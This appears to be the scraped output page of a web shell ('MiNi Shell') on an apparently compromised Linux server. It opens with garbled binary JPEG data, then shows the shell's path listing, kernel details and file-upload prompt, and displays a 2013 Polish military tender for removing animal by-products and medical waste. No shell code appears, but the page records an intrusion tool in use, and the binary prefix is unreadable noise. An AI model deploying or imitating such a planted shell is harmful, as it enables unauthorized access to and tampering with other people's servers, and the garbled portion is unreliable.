JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131217/523286-N-2013.html

<p class="kh_header"><b>Rzeszów: Wywóz ubocznych produktów pochodzenia zwierzęcego oraz odpadów medycznych</b><br>
<b>Numer ogłoszenia: 523286 - 2013; data zamieszczenia: 17.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4784 , ul. Krakowska 11B, 35-111 Rzeszów, woj. podkarpackie, tel. 17 715 56 59, faks 17 715 63 85.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: MON Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz ubocznych produktów pochodzenia zwierzęcego oraz odpadów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wywóz ubocznych produktów pochodzenia zwierzęcego oraz odpadów medycznych.
Przedmiot zamówienia podzielony został na 2 następujące części:
część nr 1: Wywóz ubocznych produktów pochodzenia zwierzęcego.
część nr 2: Wywóz odpadów medycznych.
Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.52.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada:
dla część nr 1: Wywóz ubocznych produktów pochodzenia zwierzęcego
1.aktualne zezwolenie na odbiór i transport ubocznych produktów pochodzenia zwierzęcego wydane przez właściwy organ administracji publicznej zgodnie 
z ustawą o odpadach z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21),
2.aktualną decyzję Państwowej (powiatowej) Inspekcji Weterynaryjnej 
o objęciu nadzorem sanitarno weterynaryjnym w zakresie przetwarzania ubocznych produktów zwierzęcych wydaną na podstawie art. 4 ustawy z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt. (Dz. U. 2008 Nr 213, poz. 1342 z późn. zm.)
3.zezwolenie powiatowego lekarza weterynarii na przewóz produktów pochodzenia zwierzęcego oraz decyzję zatwierdzającą środek transportu do zbierania oraz przewozu ubocznych produktów pochodzenia zwierzęcego kategorii III (ustawa z dnia 11 marca 2004 r. o ochronie zwierząt oraz zwalczania chorób zakaźnych - Dz. U. Nr 69, poz. 625 z późn. zm. lub złoży aktualne zaświadczenie wydane przez Powiatowy Inspektorat Weterynarii, że może on wykonywać pracę w zakresie transportu ubocznych produktów pochodzenia zwierzęcego.
część nr 2: Wywóz odpadów medycznych
aktualne zezwolenie na odbiór i transport odpadów medycznych wydane przez właściwy organ administracji publicznej zgodnie z ustawą o odpadach z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Sprządzony i podpisany formularz oferty, ew. pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.army.mil.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa nr 4784 Rzeszów, ul.Krakowska 11B, 35-111 Rzeszów, pokój nr 8...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 09:00, miejsce: Jednostka Wojskowa nr 4784 Rzeszów, ul.Krakowska 11B, 35-111 Rzeszów, Kancelaria Jawna, pokój nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wywóz ubocznych produktów pochodzenia zwierzęcego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: realizacja odbioru, zagospodarowania, przetworzenia ubocznych produktów pochodzenia zwierzęcego (UPPZ) kategorii 3, z kuchni  zlokalizowanych w kompleksach wojskowych będących na zaopatrzeniu JW 4784 Rzeszów:		 
 - Jednostka Wojskowa Nr 3841, ul. Lwowska 5, 35 - 301 Rzeszów , budynek nr 33 (stołówka żołnierska)
 -  Jednostka Wojskowa Nr 3538, ul. Sandomierska 20, 37 - 400 Nisko, w budynek  nr 100 (stołówka żołnierska),
- Jednostka Wojskowa Nr 3957, ul. 3-go Maja 80, 37 - 500 Jarosław, budynek nr 50 (stołówka żołnierska), 
-  Jednostka Wojskowa Nr 3233, ul. Wojska Polskiego 22, 37 - 710 Żurawica, budynek nr 100 (stołówka żołnierska),
- Jednostka Wojskowa 3928, ul. 29 Listopada 1, 37 - 700 Przemyśl, budynek nr 12 (stołówka żołnierska). 
1.Orientacyjna szacunkowa UPPZ wynosi 30.000 kg.
2.Ze względu na trudności z określeniem dokładnych ilości UPPZ przewidzianych do odbioru Zamawiający zastrzega sobie, że podane ilości służą jedynie do zapoznania się Wykonawców z przybliżonymi ilościami.
3.Ilość odbieranych UPPZ może ulec zmniejszeniu  w trakcie trwania umowy. Wykonawca nie będzie rościł żadnych pretensji z tego tytułu od Zamawiającego.
 Wykonawca dostarczy (użyczy)  Zamawiającemu  pojemniki, o pojemności od 60  do 120 l. w poszczególnych miejscach wytwarzania UPPZ. 
4.Wykonawca dodatkowo zapewni (użyczając Zamawiającemu) odpowiednie pojemniki na ich magazynowanie. Użyczone pojemniki powinny być sprawne  technicznie, estetyczne, odporne na działanie czynników zewnętrznych, wykonane z tworzywa sztucznego.
5.Wymagana ilość pojemników zostanie ustalona telefonicznie pomiędzy Zamawiającym 
 a Wykonawcą  przed  pierwszym odbiorem UPPZ.
6.Ilość pojemników poszczególnych rodzajów użyczonych Zamawiającemu może ulec zmniejszeniu lub zwiększeniu w trakcie trwania umowy. Wykonawca nie będzie rościł żadnych pretensji z tego tytułu od Zamawiającego. 
7.Ilość pojemników ma zapewnić Zamawiającemu swobodne magazynowanie UPPZ do dnia ponownego ich odbioru przez Wykonawcę.
8.Pojazdy i pojemniki wielokrotnego użytku, a także wszystkie pozostałe elementy wyposażenia lub sprzęt wielokrotnego użytku, które stykają się z produktami ubocznymi pochodzenia zwierzęcego lub produktami przetworzonymi, muszą:
- zostać wyczyszczone, wymyte i zdezynfekowane po każdym użyciu;
- być utrzymane w czystości;
- być czyste i suche przed użyciem.
9.Wykonawca zobowiązuje się do odbierania UPPZ od Zamawiającego dwa razy  w tygodniu lub w szczególnych przypadkach na telefoniczne wezwanie Zamawiającego.
10.Wykonawca  zobowiązuje się do odbierania UPPZ od Zamawiającego w godzinach pracy Zamawiającego tj. od 800 do 1500 od poniedziałku do piątku a jeżeli odbiór przypada na dzień świąteczny, odbiór nastąpi w pierwszy dzień roboczy przypadający po dniu świątecznym. 
11.Każdorazowe przekazanie UPPZ odbywać się będzie na podstawie dokumentów handlowych, podpisanych przez Wykonawcę lub osobę  upoważnioną do reprezentowania Wykonawcy. 
12.Dokładna ilość odbieranych UPPZ kuchennych ulegających biodegradacji zostanie każdorazowo określona w trakcie ich odbioru w wyniku ważenia.
13.Wykonawca zobowiązuje się, że w szczególnie uzasadnionych przypadkach ( m.in. szkolenie rezerw osobowych, osiągnięcia wyższych stanów gotowości bojowej) do odbioru UPPZ z kuchni przy ul. Dąbrowskiego 22 , 35-036 Rzeszów oraz miejsc szkoleń poligonowych w m. Trzcianiec. 
14.Za świadczoną usługę Zamawiający zapłaci Wykonawcy kwotę brutto, którą stanowić będzie iloczyn rzeczywistych ilości odebranych przez Wykonawcę kg UPPZ i ceny jednostkowej za każdy kg odebranych UPPZ.
15.Cena jednostkowa brutto za odbiór 1 kg UPPZ obejmuje wszystkie koszty związane z realizacją przedmiotu zamówienia.
16.Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia przygotuje wykaz samochodów wraz z nr rejestracyjnym, oraz pracowników realizujących przedmiot zamówienia podając ich imiona i  nazwiska oraz nr i serie dowodów tożsamości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wywóz odpadów medycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: usługa polegającej na powierzeniu Wykonawcy posiadającemu wymagane przepisami prawa w tym zakresie zezwolenia, wydane przez właściwy organ, usługi gospodarowania odpadami medycznymi w Zespołach Zabezpieczenia Medycznego (ZZM). 
ZZM będące na zaopatrzeniu przez Jednostkę Wojskową Nr 4784 w Rzeszowie:
	 - JW 3481, ul. Lwowska 5, 35-301 Rzeszów, bud. nr 2
	- JW 4719, ul. Langiewicza 4, 35-922 Rzeszów , bud. nr 3
	- JW 0941, ul. Dąbrowskiego 22, 35-036 Rzeszów, bud. nr 20
	- JW 3538, ul. Sandomierska 20, 37-400 Nisko, bud. nr 90
	- JW 3957, ul. 3-go Maja 80, 37-500 Jarosław, bud. nr 1
	- JW 3928, ul. 29 Listopada 1, 37-700 Przemyśl, bud. nr 10
	- JW 3233, ul. Wojska Polskiego 22, 37-710 Żurawica, bud. nr 49 
	Kody odpadów występujące w ZZM
	18 01 03*- odpady zawierające żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału genetycznego
	18 01 08 - leki cytotoksyczne i cytostatyczne
	18 01 09 - leki inne niż wymienione w 18 01 08
1.Orientacyjna szacunkowa ilość odpadów wynosi 40 kg. Ze względu na trudności 
z określeniem dokładnych ilości odpadów przewidzianych do odbioru Zamawiający zastrzega sobie, że podane ilości służą jedynie do zapoznania się Wykonawców 
z przybliżonymi ilościami.
2.Ilość odbieranych odpadów może ulec zmniejszeniu  w trakcie trwania umowy. Wykonawca nie będzie rościł żadnych pretensji z tego tytułu od Zamawiającego.
3.Wykonawca zobowiązuje się do odbierania odpadów od Zamawiającego na wezwanie telefoniczne, odbiór będzie następował nie później niż w ciągu 48 godzin od zgłoszenia przez Zamawiającego, orientacyjna częstotliwość odbierania odpadów jeden raz na miesiąc. 
4.Wykonawca  zobowiązuje się do odbierania odpadów od Zamawiającego w godzinach pracy Zamawiającego tj. od 800 do 1500 od poniedziałku do piątku
5.Dokładna ilość odbieranych odpadów medycznych zostanie każdorazowo określona 
w trakcie ich odbioru w wyniku ważenia i potwierdzona podpisem Wykonawcy lub osoby uprawnionej do reprezentowania Wykonawcy na karcie przekazania odpadu.
6.Cena jednostkowa  1 kg wywozu odpadów medycznych zawiera koszt transportu, a także dostawy pojemników przeznaczonych do gromadzenia odpadów medycznych (karton 20 l, lub zamienne worek foliowy koloru czerwonego, a w razie potrzeby pojemnik plastikowy 2 l)
7.Wykonawca zobowiązany jest do przestrzegania przepisów Ustawy z dnia 14 grudnia 2012 roku o odpadach ( Dz.U. z 2013 roku, poz. 21).
8.Rozporządzenia Ministra Zdrowia z dnia 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz. U. z 2010 roku,  Nr 139. poz. 940). 
9.Wykonawca powinien posiadać wymagane prawem uprawnienia do wykonywania działalności odpowiadającej przedmiotowi umowy jeżeli ustawy nakładają taki obowiązek 
a mianowicie:
 - decyzje właściwych urzędów administracji państwowej na prowadzenie działalności 
w zakresie:
 - transportu odpadów medycznych o kodzie 18 01 03*, 18 01 08* 18 01 09.
10. Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia przygotuje wykaz samochodów  wraz z nr rejestracyjnym, oraz pracowników realizujących przedmiot zamówienia podając ich imiona i  nazwiska oraz nr i serie dowodów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com